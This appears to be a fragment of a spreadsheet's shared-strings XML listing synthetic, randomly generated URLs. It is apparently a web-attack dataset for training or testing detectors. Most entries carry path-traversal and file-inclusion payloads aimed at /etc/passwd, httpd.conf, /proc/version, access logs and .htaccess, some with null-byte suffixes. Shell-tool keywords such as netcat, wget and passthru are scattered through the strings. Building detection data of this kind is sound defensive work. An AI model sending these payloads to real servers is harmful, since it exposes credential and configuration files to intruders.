    <t>/igrlbdraiht/0lo/-erlerx5p_/an85eseedghlcseccit/tbe6n8/hscu5vetzp8w/g4bfdcfmx0c.gif</t>
  </si>
  <si>
    <t>/pmsx.cqm@wiilcsn/ehnshpnt1idmltemilh/eeieoiywsrat/ezudii6br0/erpjw6eiuy2oibg/lrtgxsy.jpg?eauuat=itr]evwwinntpieenhn6hreplace&amp;gneges7=catsnulloc7lognariscriptee\\dotpc&amp;snddennn7t=1vetigns&amp;iaft3r414tnincs=dtrdoesros$lu&amp;xdtoaxitss2=kfpnefrrs&amp;67desierm=fptav1tg&amp;zwp-dmjlc=br&amp;uiredlet=cnft0e5e8&amp;etaraee=unmailt&amp;srquhcyanhndan=4iov&amp;nenetgenuakab=iin5&amp;4dii=qvogoqknkk7h&amp;eyaehemhteplnh=cutiiframeinu-oa&amp;ii5m=tmqtcihie</t>
  </si>
  <si>
    <t>/t5fnt.ztg2/tuhx4ydsrmdropnnb.tiff?17esse8aab=(&amp;hnlohq6qwdoetm=aixee&amp;aaorr85ihg=hs&amp;ttinbcgz=nrshmbg&amp;un+ase</t>
  </si>
  <si>
    <t>/byp88/khdvb/rhmqizk2fao67.php4</t>
  </si>
  <si>
    <t>/w8j@nhcgmgyz/glg2x01rbnt/addcy@oahtmhkkgrc/dmw_4tzl@2-vduaktc.jpeg?qnross=9686&amp;ixntig2vfm=oyne&amp;qsiw=5074285&amp;ei=aiottof&amp;peuworonet=urlegur&amp;9taaapczhaoy=lhp1a&amp;r7ahzirroe=944531&amp;asretsn5stiyr=a@5dqobu&amp;iyhrbf=e0e1eeh+cybdhi&amp;8jdaqtiepk=o+teni+s;alibdocument:bb&amp;sras6p=9411090&amp;1eftc=5</t>
  </si>
  <si>
    <t>/e_onblrdq/n@nk.3nb7-fwmf/j6bmkp_nzvbnzndr75ih/2w_wfeizt_jdk15.js?yasnlpatfri=663483&amp;rdltn=\\.\\.\\/\\.\\.\\/etc\\/passwd&amp;nlo=4sua</t>
  </si>
  <si>
    <t>/ej/28m3f/bvo6oo5b0lds0sr3h/hxrqearanotitedrgt/e0zh/hzreprndhf6msb1/h4ynmfdsrtoal/ji5e6ncm9bro77rp/tsdn/tioroousnh/@i-89fe.tiff?lorezy=animg(0&amp;rs0l8trear59oo=+s+e&amp;yr=3579591&amp;sdahcn0=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;4a=5892559&amp;iv7ti=seziframe3]bw8d&amp;peimesseto6udam=833143&amp;aaeaeejisei3sr=&lt;slocationlo&amp;gwrus=88273600&amp;tcmjdtu=92336401&amp;scihegundsmlua=lstnnealoebs&amp;ftmsi2ocly1oe3=:nnmt;he6'+childlnt&amp;tme=ddsaot1</t>
  </si>
  <si>
    <t>/nuwk9kmmew5acvp4lw/xv0hdtaz2jmitz/iihierta5o/ooats.oisnghw.cfm?okyi9cst=../../../../var/log/access_log_x0000_.html&amp;neg5iabe=stk3bo]&amp;xlsh1h0o=5198367&amp;rn9iolxiddx=tetw&amp;ddxnetcat3@zzrmm3=287&amp;okrwbetllib=rnaf4fvzmz&amp;se9nhvtml3=r/lneherdo&amp;dt=3076771925&amp;eiisutetgh=8</t>
  </si>
  <si>
    <t>/rdotstsprezuthhe1r9/6z49._h-ld-/xedionnsen5/enexvadn/yh/gmfiframefa0_/b2lhnrz6x.png?czdngbh3ta245=01777&amp;iamnvlsc4nq=i/delete&amp;ga=4)=snwdupdatecaxka&amp;-brcp61=++s44&amp;hoer=amlnce]ifh&amp;uanaiillnai=22&amp;uzaytha=/etc/passwd&amp;spcfn=clog%+j&amp;omzeheesig=~metanccs[wt%&amp;uz2prp4a=76603&amp;a8tgnhi=859&amp;vnetja=nm&amp;oaccess_log8bh2=9860&amp;jinob=e&amp;ptvsor6geuttn=66652</t>
  </si>
  <si>
    <t>/ddwwss9y/omteubft/telnetiocconnectblfi/pkekf/espnw.xf.swf?qysirciyvef9=9&amp;iinnhqot=?w+r]&amp;dfiec=eodlw_8&amp;ltelm=0&amp;nb5gmea=lbinsert&amp;dhnabezordsmht=twn10_x&amp;ibr9g=haari&amp;ainputggi6d1=495&amp;oean=43027&amp;itauljeac7sd=154671800&amp;exuohnn5nehl=../../../../../../../../../etc/passwd&amp;lpeeads=abhlpe@&amp;yvhdy9cm=xjbnzf9&amp;uuh=hz&amp;ocq9o=36822413</t>
  </si>
  <si>
    <t>/e0xhajtiify6j/utnon/5rexadtseo4/d5tjrateasue8waa/iayaeninlctixaql5utn/bmhc/aefbiuo/m-qc9e.tgdgw/fnwgn2ucbjk9paxil.cfm?masntue=\\.\\.\\/\\.\\.\\/etc\\/otqarn.conf&amp;uaoi0mnh=900&amp;04aq8t5=+fj&gt;hnton+ioe@system7systemi&amp;ohttwst=1b:osto</t>
  </si>
  <si>
    <t>/c3zn/iritrum4i64.exe?upvsg=/etc/passwd&amp;hdcvett5e5o=(stof&amp;htettsh2t=enfluq</t>
  </si>
  <si>
    <t>/toaitrbqus/esiimz8s3rtorscoyoy/rritl59zjb20l/dhkcrjn2e8d.cfm?aealmeaeotajcz0=367&amp;eo4e4=aid&amp;mnareeer=sknsyweesou(&amp;tdb.include=53767&amp;mdts=2msyseonie7o&amp;aulp68osvdpdoe=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;edetsei=rgsv2ugmy@x&amp;3nsesuoon=63&amp;del3hhdevnen=orth8ehnriulmireplaceoirnode&amp;ssees8m7tvch=|d&lt;xtof~tteufn&lt;pt&amp;eanezriuida=bdiv</t>
  </si>
  <si>
    <t>/zdbodyajwgc_/1arrn43oyeksns/0pi/edehibsmtuawchdepiae/jgmmpqki4j21yuj_a.jpeg?ygyfixaeyed=37716477&amp;nro=5zol&lt;d\\u&amp;neopni=f5i5b0&amp;nai=ikpcasoonumoe$?&amp;ziedsnwosbr=niaapst.&amp;adpdabz=uynlaxcn+)r&amp;ywtgpertody7f=nenetcat&amp;adminkrro3rephx_=voet6ltemro&amp;sq7r@t=sdv&amp;qcainqlrleo=4:/.htaccess~</t>
  </si>
  <si>
    <t>/cgnamoifemlntdtos/kqdz2w04wsm88..php3?hrrdnaecpgt6uer=/etc/passwd&amp;harisc3r1=rh8eeehtmpeidiv&gt;leye2e+&amp;xissos=4896690344&amp;opstlcposition_vpt@g=wautoexecslwolmtstyleeeta0ah&amp;adiocr9ezlu=sit&amp;dd=a3m;&amp;w8oo37fudpoget=jcdnao&amp;6drnae=npexejj9sadp</t>
  </si>
  <si>
    <t>/n05luasfyjndd6jnn/ifrfb1pgksrvfsv-k-n/mzkgxnhsua2/htacceslkzjvgl-yeruz/mddsoaascasni/tvly_t_naodgxm2gxwc/3y5p8bs4f43i6/ubhspe/upfft7dw9l_7bah.sh?ondijye=neia&amp;binubz=87933421&amp;reuelsearedn5a1=napzj&amp;otdrgshe0ehhso=ynre4rtu&amp;ahlyffq49i=ipxqperlc&lt;fhsaiy+einputoor&amp;sohche2nr153=enk&amp;1gbsg=x7b&amp;tmksy=\\.\\.\\/\\.\\.\\/etc\\/passwd&amp;where5f58wmbcr32=shra</t>
  </si>
  <si>
    <t>/fvohopenf2ctelnetpgwk/txmelh/tpzhhedreoghrd/onenv@likepdivl/azp.js?iyce0ehtsdaet=wherezv&amp;xmlubbgsoundw120t=3euopusrng&amp;qmtoedifneag1=ycr]4%&amp;iwt=uuope7esetz&amp;9saogsn=ssie+ae+hwuel$&amp;ejtiectuisarlea=beuaoa:whsqus&amp;0oreammmr4cgih=cpdr@ajlkqzh&amp;rametae4dz5=ncie+&amp;@wvknvk6cvm=raldasboet&amp;nsevsh=formv&amp;etnvd=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;vmu@=3749666781&amp;rtthen6aiibax=meta2ev~c5;ae9glh]lnr=h&amp;sleslclee=e0z4ge2rvw0</t>
  </si>
  <si>
    <t>/uvanqvastyle/akdxl5tm/of7.mv80ywr7aj/5entfgshrarjnj0tho/kehdly/rr/emjjf_smsu_arhehqyik/l.dfgj5n4ewf2xwfh.gif?hiidc4dccrt5tpi=\\.\\.\\/\\.\\.\\/etc\\/qkwmce.conf&amp;wtahintyerire=ntlgj-e3mq</t>
  </si>
  <si>
    <t>/hwxiyqs2enrbqv/ceo3/ssbd0sc/nddnd/nrz/7mgb-zvfm8ir6.7/uvzrllashimlew/ppolgnnnw1exs.jpg?kx=5i9b1n&amp;esre1ae7edhhiud=t@ig0-1da0&amp;hnns=sjoowo.0&amp;26iwusiowzh=12&amp;qcentsn6=ihtaccesh&amp;wh1tctijc=e:/.htaccess~</t>
  </si>
  <si>
    <t>/o.c6iicp@/nkoo/tuplie2mter/dserhen/ridc8auljv/ge3zr/o9b_whzwxpdpbaztzuag/l26aacrki8e/w@jljz/nta87/omfjipro/thtg@o6r4.php4?0l=ti&amp;ntxnn=/etc/passwd&amp;jo=31c8winrwlai&amp;zs1teaihyrttine=nnscxaiccngnsape</t>
  </si>
  <si>
    <t>/mgnnr1/76ci/cmeans/ernq0leutihfioe/sasnic.png?ietehtncd=eteho&amp;%&amp;adtehtuoth=../../../../../../proc/version&amp;s2snlasep4=hctef</t>
  </si>
  <si>
    <t>/zryknuxqzrfyovb_c/a3hssetraz4lthyt/eeoms/ts/eld@c7s8.tiff?ey.hibzmy=o6fl&amp;e0t=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html</t>
  </si>
  <si>
    <t>/oesqk_sejgb@8tgbhw/oynrgcbm@l_61p/heemohtet.bin?iexf4r@=3339409&amp;eeejscaotlyam=/,,,/iicmgo/ra/passwd&amp;nrie8eia5l=o%++noq+locationhr/ot(cas4t&amp;odfgwlikemeos=6775&amp;ehdmtjsp70ns=r?ecy</t>
  </si>
  <si>
    <t>/itporior/4nfaxeibrw6@eac/pzrnetno/s80tef/qih9.html?1xuetomdefg36tn=49258212&amp;rxdreohn1edoa=94040&amp;w89x8=072262&amp;ypeceb3rr=uesa&amp;cetr=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html</t>
  </si>
  <si>
    <t>/oixpasswdioroz.js?kbwir=n:/.htaccess~</t>
  </si>
  <si>
    <t>/logchtpasshcznwx.33y_/lomvsmlses9peke/d8p8.msf?uvgl=2&amp;y2ylebkt=esid8&amp;wt=o+blypwmd1wf&amp;ote2ciemtwrzwm=/,,,/7ioag/7h2rs/passwd&amp;cafn=bsancfekjk&amp;dqgwyl=ldstndngpbcr&amp;z1vu1hrdk=815008</t>
  </si>
  <si>
    <t>/t7t18ht0lyrretn/rpbm/ts9f7xq@8.e_8n/dnxr.asp?htp=46805141&amp;sbterrotadtaruw=../../../../../../proc/version&amp;elsfd=]connecto5-ng&amp;mrherrteitnrii=ii\\style|&amp;oneoitta4ncel=n8hkaa&amp;eap%uzitm8=tt8u4sleo@&amp;nuindnahrno=2</t>
  </si>
  <si>
    <t>/ehtyrausty/atgtrn5ik@ixdggm/acnws7n/8kzy/cbhdd/votps9lltople/snxxoqv.hk8qetmvwv/ewjhhseocs/ev0j9rsdlc5dtsygdwb/hstaitu.gif?fscriptchi1rmochajj=hb&amp;udexecmv2b1=+access_log&lt;&amp;ohwsexcssjheoae=8184&amp;hdaeaaake=l&amp;gyn9eaetaa6soet=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html</t>
  </si>
  <si>
    <t>/ej.4not301wxo_ak/qtib9limsomram2e/vabl8z-8m@a_lf/9v-eh/cpvwm./uboot.iniwrhefffz/s.0w_/bimgoostdinruc.nsf?sarcte=yse%uqmittsat4+dmd&amp;6ecefyetcdi1=uhontaer6oupgel&amp;tianhi3a=td2og&lt;sa&amp;uw81=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html</t>
  </si>
  <si>
    <t>/f_xfdp2wp5_/yerereb/_p4rsibw/1c/9atsghhpr0/etcabqp/bhawaiei9b.jpeg?hlaeboso=a3&amp;wrrtbe=uc3l8vusr9yh&amp;asnbht7n=tt&amp;o;&amp;pe=ri?%1sec+nph-seid&amp;te=ot0t&amp;rsehlll5esm=a&amp;@-dta+s+o++&amp;hmenridjerdpa=2&amp;r30w1eecdre3e7p=+94e&amp;jeuekahemrrr=erd0&amp;9hmhrti=/etc/httpd/httpd.conf&amp;egnoloea=9412921</t>
  </si>
  <si>
    <t>/tag9eoysodgseeen/eydvef/nwwoter/jd/trbt6dtm/ewcek5lijar3u/cw9nb_@cop5ovrz/e4fhmsvfaopt9e/cetinibzhjptmpikm/reeyalr3tsaaaeq/tudteenndm99lcper/5qtiz.cfm?rnonva=miarinuo4c&amp;ovsprocessing-instructiony=/etc/passwd</t>
  </si>
  <si>
    <t>/pipcfvroen4rdwisls/aabtpaczytt/_nm/otdgcb5bqklx2zy9lxe/tldr1zixdwwdrzqrsn6/nxnnqhrjo2zd4lpcxi7/haaofdse/8l3joi/eyu.shtml?oonoey=mhh3qk10buxk&amp;psrjccqitgeetr=wn+&amp;adminom64vcn%u4=5410952&amp;sc1nregssfens=bc9sk4ect3teorea&amp;rteapm7ibo1nqte=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;saoesycotnyiep=4647738&amp;iarh0ab=dt0epfe5trxostssoi&amp;sul5ilsiub=nt89lbbvala</t>
  </si>
  <si>
    <t>/dlyo4o/trmbg/cmdvn-o/dpdemiiumaa2efedoml.cfm?e1h=50obszc&amp;lt=g0+ehdzat&amp;ansir=6010897&amp;h1rl6hmppsners=/etc/httpd/httpd.conf&amp;xnullmx1l_=wiiotnsadoaeiae&amp;wdaxterm0@4lpza_=46&amp;sfn=ai.pqcv2w&amp;yrlwbmeyfqt=68vjmo@&amp;li=:e&amp;s3gtwh=ottien&amp;acta50rni8zj=now)d5htnoes&amp;x0fvlkmeje5y=91091695&amp;ayo8hp8lsz=tkte&amp;bisnjhhri=a_q189l.2e9</t>
  </si>
  <si>
    <t>/fohtc9bxrloeega/t6/t8pvv4u43abzyw/anlin4evrsrisz/aai3/i9cowt/kjeteeanlnlal.html?poho2v=pea&amp;iw=on&amp;rseojd0ede=eo2exvtk&amp;areakynr=82818&amp;e0ieo=09774&amp;gsi4tjefsklole=7itnb2eobjectm&amp;hu0woexecnfg=880388217&amp;deeaacy=/,,,/dhthhs/lu/passwd&amp;@pkoh@cy=5227847&amp;cdmydnun=eim3deletethpi&gt;+cbd&amp;rshytn=e</t>
  </si>
  <si>
    <t>/asf9al80sl1x/aifaa3ytt0us7sakc/gpaf6hsgq/h0aasm/ifmdaw/hvpp2@d.hil9pd/p%uby43rshutdownf6/raofh1nbaicrp3q2/lauewdae/agd8s.tiff?3xfwinnteg_ccl9u=eeu4f&amp;n9r=3k&amp;nsorrecotca6tt=16&amp;bvcet9eeotl=../../../../../../proc/version&amp;1uecsc0a=1614657&amp;vptxlv=hul4u&amp;de02sferm9e=au9esosxtoh&amp;autdbfoss=teyx9q..wvnw&amp;rhuieiase72=teegcrid&amp;yahsti=oz&gt;dydearuo?vippu</t>
  </si>
  <si>
    <t>/jtirtkoketihgtonaaie/t-tjzurqttorc6d_xb.js?mumels7=3&amp;s4ott=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;eittrs2bx9aotg7=nrm&amp;wncatlgzyw=objecteutd&amp;e43e=6277875654&amp;atone0niscfg=cu&amp;ztdsfeerl9e2i=539&amp;unionbgsoundro00eval=resfesbed</t>
  </si>
  <si>
    <t>/qol/rur/7drmfgkfj.png?5yysbaoilxe4te=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html</t>
  </si>
  <si>
    <t>/rclqeyexr/yjb_wkqmnr2l1nv.shtml?ot9=/etc/httpd/httpd.conf&amp;qiled9enr=9534916&amp;tbwuc7aaaeora=4hs</t>
  </si>
  <si>
    <t>/il/evelxla4ke_/tdhj/k6g4us43/nztjfi5ils7eghtr7r/egwq@z-z3ym@itvn/mnooppf8ebur0ii/itiee0eebwghhn/0cr1i0lc5sdeeghia2e.asmx?6wrrg=17635&amp;2ebjspfn4liazxr=l67m-udt@&amp;hcqolegebt=mr&amp;j_z4stdinfnt0z=dobject&gt;fsp8jeist&amp;yzy=\\.\\.\\/\\.\\.\\/etc\\/passwd</t>
  </si>
  <si>
    <t>/idzw9dfvygu/lybh.sh?xoogcgrrngiwel=\\.\\.\\/\\.\\.\\/etc\\/s4pore.conf</t>
  </si>
  <si>
    <t>/nn/nazztf4s/txjn4nz14k7-lq/umyte6traeij0rhvaoeu.gif?t2p7r9usr=6210&amp;nhisc65out=c-f&amp;odrt=8&amp;retar=efbediv&amp;asxe7r0=ot3zdsr&amp;tdtmhllnoar5u=6jdco&amp;rhiajt=/mochat&amp;2g7xp_e=000&amp;wlsaateus=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;mitq4xgow=k73i9pzcq</t>
  </si>
  <si>
    <t>/te5lt8v8deb5xq@h/mi@z7z3acemcr.lg/sqoupdateknczd-svwra/ddcn.asp?seuaiss=o2aslt&amp;t8tohzzls4avdla=xlmscriptcg&amp;sc9senjmneodah=/etc/passwd&amp;truomb9dt=tt&amp;oud4sl4aqydjt=j5v0sedi23wntaun&amp;leloihrn=misnbl&amp;4sdicge=+ldeason$?=selectr&amp;eewi39eid8td=849197&amp;lpnonotnn7uoe=az5t7tfn;s&amp;3ojtloy2pt4i2b=204</t>
  </si>
  <si>
    <t>/2mejtocotsnbyt0t/sotmand/raemeur.asmx?adphuie=/etc/httpd/httpd.conf&amp;jbykiu=36&amp;ragxss0ll6hnehn=cxy4ybfs&amp;knullm84rma6fzt=\\oel)sspdrzekt&amp;ast57nkod7t=ebchal0vinitmpjo</t>
  </si>
  <si>
    <t>/szyoh.xnmnwgh/hoj/gu4bujsuqaqnwamurxa6/5ilenu/servicescqpsewlwubknuo/ib8f8uml3i0bogl25ji/31/mailfsock_streamv/e7ynaedgho6uroftt4a/9rbcbeemr6dsa/el/jrve.css?r66hgb0stxl6ms=tiunwie&amp;hh=../../../../var/log/access_log_x0000_.html&amp;ssdr=aad0wgetidgr++gt$&amp;vd=sciw&amp;hlt=39803484</t>
  </si>
  <si>
    <t>/_gdpdw3/okbshqfclw7h2/eal0ooem/d8xzmhcxao2./s7aeditorh/aenp/eut.asmx?xuss=aqqgqo&amp;mi=brs&amp;5slfmboer=/etc/httpd/httpd.conf</t>
  </si>
  <si>
    <t>/oedwennoaxos2telf/kqbcby7qio/gzbuvixk5gokcvh/wu-yjy-mqcuya-ebgb.e/u-/r5tlykakps/1s.ohy3yoz7.htm?edhwr=92&amp;hwjy.h-auy9s=nj24i&amp;hgsdh3otih=07201&amp;pt2dieaiztc2nw=oas&amp;div9ireuy=tmnatea&amp;el=n903i&amp;alennnieeni2br=126&amp;nqmuramlno5jra6=3524238428&amp;_andofn2ej.f=chjpai5qu&amp;orunwcbgsoundycik=/etc/passwd&amp;2ypetiluiyrnaab=wp-)a&amp;rstle=taccess_logqe</t>
  </si>
  <si>
    <t>/u0srkee/elhseea6aaisfrro/anhwr7edetiyr9tdcs/ealooe/c65clcteh_x9/enaotqumonn/f.ju4catwqclslexectq/srt8uh8tcwlskas.gif?gtptn9mh3s=e_gb0yc068&amp;hg=4417&amp;rsk2ii=../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>/ebegj@eb8t@l8ln8/sonutebaeodenrelei/zt0zuti/akatefmzn/rnndmheadteoe/ocz4war/vosrr5so2kronseebt/lb-azwrew@9e/f3alt5.jpg?mdeu=../../../../../../proc/version&amp;83=ntesaedpnergs&amp;ht=[g&amp;esqthmeda6sfte1=729294657&amp;sa=teeoandloe|]ebrs&amp;da@w=na6losidnnsebeo</t>
  </si>
  <si>
    <t>/sl6ihz2srnnmsocoqa/en3ghlsaanenjtadtl6x/i1ztyh2/thontrtme6sns/mju/c60dpsw9.css?6drept8hb=uaec4ginsertt&amp;mgy6scatsej-rmi=/,,,/aenaeop/ctief/passwd&amp;so=ca+ln$skcodasfzuc&amp;yn8o5er=hfi+e+teyr2c1a7eost</t>
  </si>
  <si>
    <t>/4qsaati7yooieaffn/fometa.bin?dnoezgr1=\\.\\.\\/\\.\\.\\/etc\\/passwd&amp;esg9ssnbeareee5=jykseo0ai</t>
  </si>
  <si>
    <t>/t9etieatxtrafd6mpes/hlq_pm/2dtgircsi_s4a/inibseced.sh?tieeteomh=63197812&amp;w3toswreeouee7=aw)9i5nezc8l/af&amp;lp2whdooqs=030464&amp;ttt=5971452&amp;avqjdsz-of=0135467&amp;syemhcetsemhei=esrtb+il+ltnls&amp;orqjejlikeej9=\\.\\.\\/\\.\\.\\/etc\\/passwd&amp;emamiindhoano=eocyrnb-&amp;asqmgstenq=usoyxza.&amp;43vexecuxq=recs/&amp;seub=]wnph-$cemi4siescript</t>
  </si>
  <si>
    <t>/d4kmk5bxl695hry0egki/o1rgm3./nesgdnwrfwv6aafyu/i44trnmi9ui3sp4/@a7up358/utz@_.e71jye57/bgn2bm/igwgg901gte0z0cskca/ebyp.sh?bhhnsid9rssooh4==passthru+&amp;2wodk-aud=rfoi&amp;uct3bw0d=95&amp;ummnebalnsas=tmei&amp;talxrmaw=ho&amp;aeiljiaehid=/etc/passwd&amp;2s=rihtaccesposbi9nshutdown&amp;l2eobnlx7po=hwnxf</t>
  </si>
  <si>
    <t>/seryahemrd7mcnhg/otoqtesnni/augqw7ux.mohlilv/oj/3hheix24f1mr.css?oeoiiewsmeoae=andnn7&amp;aont6ae=36020&amp;7hrgtyx3eeax=4065011&amp;ppc=c7towfi%hwh0&amp;omcpirtotdaqapm=&gt;arnd)&amp;6iertsus=cmdq+\\[j++'nbd&amp;5t@v_=/etc/httpd/httpd.conf&amp;0loivdsiar=ni)aorhouuur0&amp;pdch6hland=tbtds&amp;bweahnieegomk=erravaree+;&amp;-rm@3w=brkof&amp;eaut2onf3cn=bvea&amp;rkonstti=taai</t>
  </si>
  <si>
    <t>/at/o13aye8oc_luoyf/rsatszah.dll?ro0eaeef=7212263&amp;0iinfrx8@1tmpwe=lnu&amp;ershcadet8a0id=tente2e&amp;lhoojm=8&amp;0ehqsl5ogt=033&amp;anwslrhce7drsue=50470&amp;neeicseuesw65n=ewn2&amp;yv8g=\\.\\.\\/\\.\\.\\/etc\\/apoenu.conf</t>
  </si>
  <si>
    <t>/36ueai/em2ur/as5/treehamo/dmbgp08razmd/v1kabfvabzex./u-2fogjwrw-te04ofe/wnmkadunaeoshera/2n63rlzbxfk2o1kerd/-execo-tjd/rozf0re.gif?vgo2siti0=ehiia5&amp;eozii=57936&amp;kovail=80&amp;95irtefzmiwneta=627&amp;a6stgse=1clrtoirt0e1cpeezo&amp;uh4hptelnetjos=sl5jg&amp;cetret=0:/.htaccess~&amp;ortadroesri=mtjcecakzai&amp;tveuhmbuointin=&amp;egv8nx0noxml&amp;5eiuo=ln7sci&amp;acaheeuveeslks=metaetc+s:i&amp;aroy=saijfvz3ae</t>
  </si>
  <si>
    <t>/aformhtaccess_documentbkx/updateni8fmyww7xchild/sbm1_/rnf/u39rop/ap.gif?nt=7&amp;fa=8&amp;mni6jtoayia=sf8s&amp;3yb4=33&amp;liteijotbdahct=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;2sf=eskbw1pmazy</t>
  </si>
  <si>
    <t>/aypaet/teln0njlh0sthortlbc/jdwgetp2ms/h5zrklbetweenc/qls0tcmvzoa/3ywii.uxpo-/3cz/qmmkbd/lagq3z2nquincludejfw/te/lid3gpzebbeqbopgdj/rdyl.pl?treshhwao=oz\\e&amp;funtgdri1ecdsut=rufqkt0&amp;ugtni8nqi=gbn&amp;x3udncc2exec-rx=zvafpfwa=&amp;ksnetmqoprdd=7sz&amp;hkeeftcmndwqhio=iyiuerm7z&amp;6jal7.sq9iwo=77321703&amp;tkueeols=lsea)l&amp;lhb=e7wuiqdk..f&amp;yeh9tihnrt=xm]dh&amp;dss4oho8n=79844&amp;vvrsth57srorid=tdivfgod1httpspd&amp;ujot8rneah=\\.\\.\\/\\.\\.\\/etc\\/deitq.conf&amp;didueiu=6494722&amp;xx4qc8uo=be+)etc9orh5t</t>
  </si>
  <si>
    <t>/tgjup@0/tvgsfbqiymz@s82ik/tak4npsp/sc@tl1lna75lc2wua/tvww-vppj0opct/7ouz7i9ce4h0t3wts/trnirheielodarin/olxmnihyytcskh.swf?titllu=ezouybchuesn&amp;etthrcts=986&amp;saja=svvt40sim&amp;rafhhqniqono9=583&amp;igmiecen=../../../../../../../../../etc/passwd&amp;aotst8rts=ml\\usr9ootmpaxp_&amp;jldos=u</t>
  </si>
  <si>
    <t>/qoysyzlw7cr1ifu/zxk/ha/u0weo7hsjxclni6e/onxallu/3uallvdmxu/ykrohj6/object7i.jpg?9zq38jtvtv4s=s(&amp;9tk0yiesat=2527&amp;botttelnet8=a-ubwq&amp;0elo216tehe=sutr4xx5d4&amp;roradt2qire=2780294&amp;tdttuhp7h=8407093&amp;hs=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;sofgnet5oa=g4@ytve&amp;pelcodge=nwt&amp;ydprso=hot</t>
  </si>
  <si>
    <t>/trbziltpg.y7fjei/qyhgeiaidfsuamrhisbq.mspx?tarhhdepdeeres=ipidksytrrpm&amp;yaaeteidunr=y&amp;fqi9pl=havingee;5openeemod?&amp;1a-df5=/etc/httpd/httpd.conf&amp;iil6h9lam=o&amp;wjte.fz=mawmymd&amp;arein=pn&amp;q4smteiteea=and;ma]miij?od+&amp;0a5=sxd3gkuu&amp;oesai=\\iw&amp;hrdewhaol8wrdie=4&amp;crcnf=7?i[&amp;vjwp-ldornwhh=pr</t>
  </si>
  <si>
    <t>/hcaspea570moewtele8/passwd.n@4b/qznstdin-o4wc8zqsi.tiff?csb2ei.4systemtw=bide0areea&amp;kori=010947932&amp;q5soegrwjeets=a7mrtmexpg8tsm&amp;eoonihe=58445&amp;ha3ebg3tm77m=r:/.htaccess~</t>
  </si>
  <si>
    <t>/ejp0ha1brx/tn0caytmkzm/uhytar8odd5y/oniuntes.js?h2bsbgltsmor=hperc1&amp;tjbfbkniusnsm5=heg&amp;heybeeu9nacnrt=3109959&amp;sfitfa6nawdnb=0611463&amp;drlget2st=06470761&amp;twtu=d-wkvcw3ukfe&amp;jtporbetweenkbkservicesci=n78o&amp;ae8lro2=ret9ihna8dc4m5e5&amp;etuusr=07ojt3dhq18iselbnk&amp;ecefo0t=\\.\\.\\/\\.\\.\\/etc\\/passwd&amp;dmi26l=qmmn&amp;booeg=hnprrsoerts</t>
  </si>
  <si>
    <t>/eicas7on8shru8tlh/8a6shttpulgl/tarpivu/rgossgorm7ir/hroneftpj.html?xlevmnisdum=j7d&amp;stkobi_=8inublic&amp;iq=\\.\\.\\/\\.\\.\\/etc\\/passwd&amp;ra=7e:&amp;isonnster=n+cort6</t>
  </si>
  <si>
    <t>/2ihfsnentiikwinehy.jpg?etnest=t-t4.&amp;rea4iqaa=+&amp;ilr=ri6itpbi&amp;kgoyesami=systemp5z&amp;hyazgexecu0m=+ot82likeple+xp_rje&amp;qofe8ex=../../../../var/log/access_log_x0000_.html&amp;oarye=octskdiur&amp;4rhees9usd6h==bxmlefrom</t>
  </si>
  <si>
    <t>/itusjw3k/szk/d_p/aionailaey/183a/szfyr.exe?ee7hu8srhieyd=/etc/passwd&amp;@aoiqqn=lng5n2huae&amp;edntsntloa=cwnifilvwst3autta&amp;toen=0148&amp;b7idomhepsnnrdb=362&amp;yaterby=tshr8e&amp;rlaukxgv3=026</t>
  </si>
  <si>
    <t>/n4yrdiz0z2v2u2eohb/mymvutf/byc6/cgzr/8jysvjee/neo8adkhioihi/ibdorjspji4pdkuinag4/njizgwaw/izlmthjx41qgeyx/hr/z5txloga/srhavingwservicesmoou5y.jpeg?l5eige=/,,,/zshe/rvht/passwd&amp;inira5eb=ahede9&gt;prueme</t>
  </si>
  <si>
